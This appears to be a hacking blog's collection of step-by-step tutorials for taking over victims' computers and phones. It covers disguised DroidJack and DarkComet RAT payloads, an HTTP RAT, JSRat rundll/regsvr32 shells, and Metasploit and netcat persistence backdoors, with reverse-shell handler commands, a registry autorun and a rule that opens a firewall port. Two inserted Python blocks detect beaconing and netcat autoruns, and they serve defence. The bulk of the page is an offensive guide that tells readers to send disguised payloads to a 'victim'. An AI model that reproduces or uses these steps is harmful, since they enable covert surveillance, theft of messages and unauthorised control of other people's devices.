Showing posts with label Keylogger and Trojan.

Hack Any Android Phone with DroidJack (Beginner's Guide)

DroidJack is an Android RAT which gives you the power to establish control over your victim's Android devices, with an easy-to-use GUI and all the features you need to monitor them.


First of all, download DroidJack from http://droidjack.net/ .


Now run DroidJack, which is an executable JAR file. It will prompt you to log in, so enter your username and password.


Clicking the Unlock button will open the GUI.


Now click on Generate APK and then edit App Name and File Name with names of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and the port number of your system in the Port Number field, then click on Generate.


After some time it will generate a prompt showing that the APK is successfully generated and can be found in the same folder as your DroidJack application.


So now go to Devices and set the port field in the lower left corner to the same port with which you generated the APK (in my case it is 1337), then click on Reception to start listening mode.


Now send the APK RAT to your victim by any means.


After installing the app, when the victim clicks the button we will get the Android session.



As you can see below, the phone is listed in the Devices list.


Right-clicking on the mobile device will give a list of options which you can use.


For demo purposes I have used SMS Trekker and, as you can see, it has dumped all the SMS messages.

HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as an HTTP tunnel, except that it works in the reverse direction. These Trojans are comparatively more dangerous because they work over the web and thus work almost everywhere you can find internet access.

Here we will be working with the HTTP RAT backdoor webserver by zombie.


So download the above from the internet and extract the tool. It should look something like the picture below.


Double click on the folder and click on the icon with httprat written next to it. Something like this picture pops up on the screen.


Click on Create. This is what should pop up on screen.


An icon-less application named httpserver should be created, as in this picture:


Send this file to the victim via pendrive or any other means. Once the victim double clicks on the application, it automatically sends a connection back to you. You just need to type the victim's IP address into the browser. This is what will come up on the screen:


5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results. Then run the command:

persistence

run persistence -X -i 10 -p 443 -r 192.168.0.105

-X = connect back when the system boots
-i 10 = try to connect back every 10 seconds
-p 443 = reverse connection port
-r ip = reverse connection IP
After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.0.105

exploit
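A defender-side counterpart to the `-i 10 -p 443` reconnect behaviour, added here as an example and not part of the original post: the fixed-interval reverse connection that the persistence script produces shows up as beaconing in outbound connection logs. The log format, the host 192.168.0.50 and the decoy destination 203.0.113.10 are constructed for the example; 192.168.0.105:443 is the reverse connection target configured above.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection log (one line per TCP connect, as a host
# firewall or flow exporter might record it). Host 192.168.0.50 and the decoy
# destination 203.0.113.10 are made up; 192.168.0.105:443 is the reverse
# connection target configured in the persistence command above.
SAMPLE_LOG = """
2024-03-01T09:00:00 ALLOW TCP src=192.168.0.50 dst=192.168.0.105 dport=443
2024-03-01T09:00:03 ALLOW TCP src=192.168.0.50 dst=203.0.113.10 dport=443
2024-03-01T09:00:10 ALLOW TCP src=192.168.0.50 dst=192.168.0.105 dport=443
2024-03-01T09:00:20 ALLOW TCP src=192.168.0.50 dst=192.168.0.105 dport=443
2024-03-01T09:00:27 ALLOW TCP src=192.168.0.50 dst=203.0.113.10 dport=443
2024-03-01T09:00:30 ALLOW TCP src=192.168.0.50 dst=192.168.0.105 dport=443
2024-03-01T09:00:40 ALLOW TCP src=192.168.0.50 dst=192.168.0.105 dport=443
2024-03-01T09:00:50 ALLOW TCP src=192.168.0.50 dst=192.168.0.105 dport=443
2024-03-01T09:01:05 ALLOW TCP src=192.168.0.50 dst=203.0.113.10 dport=443
"""
LINE_RE = re.compile(r"^(\S+) ALLOW TCP src=(\S+) dst=(\S+) dport=(\d+)$")

def parse_connections(text):
    """Yield (timestamp, src, dst, dport) tuples from the log format above."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), int(m.group(4))

def find_beacons(text, min_connections=5, max_jitter=0.2):
    """Flag (src, dst, dport) flows whose gaps between connections are nearly
    constant. max_jitter bounds stdev/mean of the gaps: a scripted reconnect
    every N seconds scores near 0, while interactive traffic scores far higher."""
    by_flow = defaultdict(list)
    for ts, src, dst, dport in parse_connections(text):
        by_flow[(src, dst, dport)].append(ts)
    beacons = []
    for flow, stamps in by_flow.items():
        if len(stamps) < min_connections:
            continue                      # too few samples to call it periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append({"flow": flow, "interval_s": round(avg, 1), "count": len(stamps)})
    return beacons
```

Tune min_connections and max_jitter to the log window you analyse; a 10-second reconnect produces many identical gaps in minutes, while a boot-time-only (-X without -i) trigger will not show up this way.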


s4u_persistence


Now type use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of Kali Linux)
msf exploit (s4u_persistence)>set lport 443
msf exploit (s4u_persistence)>set trigger logon
msf exploit (s4u_persistence)>exploit

After successful backdoor creation, restart the victim PC; you will see that the previous meterpreter session is closed. Then run the commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.137
exploit


VSS_PERSISTENCE
This module will attempt to create a persistent payload in a new volume shadow copy. It is based on the VSSOwn script originally posted by Tim Tomes and Mark Baggett. The module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need a password in order to start a session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique, then background the session. Then run the following series of commands:

Now type use exploit/windows/local/vss_persistence
msf exploit (vss_persistence)>set runkey true
msf exploit (vss_persistence)>set schtask true
msf exploit (vss_persistence)>set rhost 192.168.222.137
msf exploit (vss_persistence)>set session 2
msf exploit (vss_persistence)>exploit

Now run exploit, which will create a backdoor and give a meterpreter session.


Now background it, use the multi handler and set the payload with the commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4444
exploit

Now restart the victim system; the meterpreter session will die. Then run exploit again, and after the system restarts it will give a reverse meterpreter shell.


REGISTRY PERSISTENCE
This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in the registry.
First background the meterpreter session and then run the commands:

Now type use exploit/windows/local/registry_persistence
msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of Kali Linux)
msf exploit (registry_persistence)>set lport 4545
msf exploit (registry_persistence)>set startup system
msf exploit (registry_persistence)>set session 1
msf exploit (registry_persistence)>exploit


Now set up your system for reverse connection. Run the following commands on your msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4545
exploit

Now restart the victim PC; your previous meterpreter session will die, so run the exploit again:
After restarting you will get the reverse meterpreter shell, as you can see in my case.


NETCAT

Netcat is a featured networking utility which reads and writes data across network connections using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC, run the following command:
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32


Now set the registry value with the following command:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'


Now get a command shell with the command shell, then bypass the firewall on the victim system by adding a firewall rule with this shell command:
netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445


Now check whether the rule was added successfully with the command:
netsh firewall show portopening
As you can see, the firewall rule netcat has been added successfully.


After the victim system restarts, run the following command in the terminal:
nc -nv 192.168.0.101 4445
Here 192.168.0.101 is the victim system on which you previously created the backdoor and 4445 is the port you gave while setting the registry value.
After the command runs successfully you will get the command shell.
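A detection check for the autorun-plus-firewall-rule pattern described above, added here as an example and not part of the original post: it parses `reg query` output for the Run key and `netsh advfirewall firewall show rule name=all` output (both samples constructed to mirror the walkthrough, with the netsh listing abridged to four fields) and reports any autorun entry that starts a netcat-style listener for which an inbound allow rule exists on the same port.

```python
import re
# Constructed samples mirroring the walkthrough: `reg query ...\CurrentVersion\Run`
# with one benign entry plus the netcat entry, and an abridged netsh rule listing.
RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    netcat    REG_SZ    C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe
"""
FIREWALL_OUTPUT = """
Rule Name:                            Core Networking - DNS (UDP-Out)
Direction:                            Out
LocalPort:                            Any
Action:                               Allow

Rule Name:                            netcat
Direction:                            In
LocalPort:                            4445
Action:                               Allow
"""

def parse_run_entries(text):
    # Indented "<name>  REG_xx  <data>" lines of `reg query` -> (name, data)
    return [(m.group(1), m.group(3)) for line in text.splitlines()
            if (m := re.match(r"^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$", line))]

def parse_firewall_rules(text):
    # Each "Rule Name:" line starts a new dict; following "Key: value" lines fill it
    rules = []
    for m in (re.match(r"^([A-Za-z ]+):\s*(.*)$", l) for l in text.splitlines()):
        if m and m.group(1) == "Rule Name":
            rules.append({"Rule Name": m.group(2).strip()})
        elif m and rules:
            rules[-1][m.group(1).strip()] = m.group(2).strip()
    return rules

def listener_autoruns(entries):
    # Autorun values launching nc/ncat with a listen (-l/-L) or exec (-e) flag;
    # the port follows the flag cluster ending in p (e.g. "-Ldp 4445")
    found = []
    for name, data in entries:
        if re.search(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b", data, re.I) and re.search(r"\s-\w*[lL]|\s-e\s", data):
            port = re.search(r"-\w*p\s+(\d+)", data)
            found.append((name, int(port.group(1)) if port else None))
    return found

def correlate(run_text, fw_text):
    # Report each listener autorun with the inbound Allow rules open on its port
    rules = parse_firewall_rules(fw_text)
    return [{"autorun": n, "port": p, "firewall_rules": [r["Rule Name"] for r in rules
             if r.get("Direction") == "In" and r.get("Action") == "Allow" and r.get("LocalPort") == str(p)]}
            for n, p in listener_autoruns(parse_run_entries(run_text))]
```

A finding whose firewall_rules list is non-empty is the complete pattern from this post (listener in the Run key and the port deliberately opened); one with an empty list still deserves a look at the autorun value itself.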

Hack Windows Server in Network using Atelier Web Remote Command

Every geek, system administrator and help-desk person loves the ability to access computers or laptops remotely, but we also know that accessing a computer remotely usually requires installing the same software on the remote computer as well as on our own. Atelier Web Remote Commander (AWRC) is a powerful tool for geeks and system administrators because it can connect to other computers without installing any software or doing any configuration on the remote computer.
Atelier Web Remote Commander (AWRC) features:
· Runs across firewalls.
· Performs deep audits and all kinds of maintenance operations.
· Does not leave traces on the remote machine. It is absolutely safe.
· Zero-configuration simultaneous connections.
Now let's see the practical working of this tool.


Download Atelier Web Remote Commander from here, then install and open it.


In the Remote Host column type the IP address of the computer or server you want a remote desktop connection to, then give the User Name and Password and click on Connect.

After a few seconds you can see that the desktop of the remote computer appears in front of you. Now you can see information about the remote system and access files on the remote computer.


Go to the SysInfo tab; here you see all information related to the remote computer, like the version of the running OS, BIOS information, details of memory, etc.


In the NetworkInfo section, you will get the most interesting information about the remote system, like the routing table, running protocols, open ports, IP statistics, etc.


The FileSystem tab will give you access to the file system of the remote computer, where you can access all files and data on all drives.


The UserGroup section will give you details of all created accounts, their privileges and the group to which each user account belongs.


If you want to chat or tell something to the remote computer's user you can also do that: simply start the Chat window, type whatever you want to say and hit Enter.


Output on the remote victim's computer.


Hack Remote Windows 10 PC using JSRat


Learning only one framework such as Metasploit has its own limitations. Today's ever-developing cyber world requires end-to-end knowledge of every tool and framework, so that if you are cut off from one method you have another to save yourself. That is the reason that today, through this article, we are going to learn about JSRat.
Table of contents
· Introduction
· Downloading and installation
· Access the webserver
· Rundll attack
· Regsvr32 attack
Introduction
As the name suggests, this tool is developed in JavaScript. Numerous commands and controls of this framework can be used for multiple methods of attack and also to hide malicious traffic. These attacks can be done in various formats. JSRat was developed by Casey Smith. He developed this framework as a prototype tool. It allows the payload to connect to a listening server. 3gstudent is the security researcher who extended Casey's work and refined the tool. He developed it in PowerShell, due to which extra features were added. These features were created in Python, which allows the server to be both Linux and Windows friendly. The basic protocol used by the server is HTTP. Usage of both implementations, i.e. in Python and PowerShell, is shown in this article.
Downloading and Installation
As this tool is user friendly, downloading and installing it is very easy. You can download it from here. Once you copy the clone URL from the link provided, type the following command to download it:
git clone https://github.com/Hood3dRob1n/JSRat-Py.git
Running the command above will download and install JSRat. Once it's all done, use the following commands to check the files.
cd JSRat-Py/
ls
Now, use the following command to start the framework :
./JSRat.py -I 192.168.1.107 -p 4444
In the above command we have specified the IP of our own machine and the port for the webserver to run on.
Once the server is up and running, it will show the various files it made, as shown in the image below:
You can find these files by accessing the server from your or the victim's browser. If you look closely, there is code given on the server. This code allows you to execute the rundll attack.
Copy this code and paste it into the command prompt of the victim's PC, as shown in the following image:
As soon as the command is executed you will have a session.
Now on the same server there is a regsvr32 file, which can also help us get a session.
Copy the file command and paste it in the run window.

Similar to the rundll attack, after running the above command you will have your session.
Conclusion

This framework returns an HTTP shell using JavaScript. The two attacks shown above demonstrate that rundll and regsvr32 run JavaScript code from the command prompt and an HTTP shell is returned while the code executes. As it works through the server developed in Python, our malicious files don't get written to disk, which is an advantage to us. This also increases the possibility of being the stealthiest of attacks. Another advantage is that this file can avoid being killed. Therefore, this tool proves to be great without fail.

Hack Remote PC using DARKCOMET RAT with Metasploit

Download DarkComet RAT from here. After downloading DarkComet, unzip the archive file.

Set the location of DarkComet and type "wine DarkComet.exe".


First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)


In the next screen click on DARKCOMET RAT, then select the Server module option and click on Minimalist.


This option will display a form: fill in the ID with your name, the IP address and the desired port number. Also add the destination path where you want to save the .exe file, then click on Normal.


Now save it on your desktop.


Again open DARKCOMET RAT and select the Listen to new port option.


Now enter the port number used in the form above and click on Listen.


Now hack the victim's PC using Metasploit (see How to Hack Remote PC).
Now you'll get a meterpreter session on the victim's PC. Use the upload command to upload the backdoor exe file which you created using DarkComet:
upload /root/Desktop/updates.exe d:\\
Now type shell to get the command prompt of the victim's PC and run the uploaded exe file.


Now you can get the session of the victim's PC. See the screenshot below:


Click on System Info and you can see the whole system information of the victim's PC.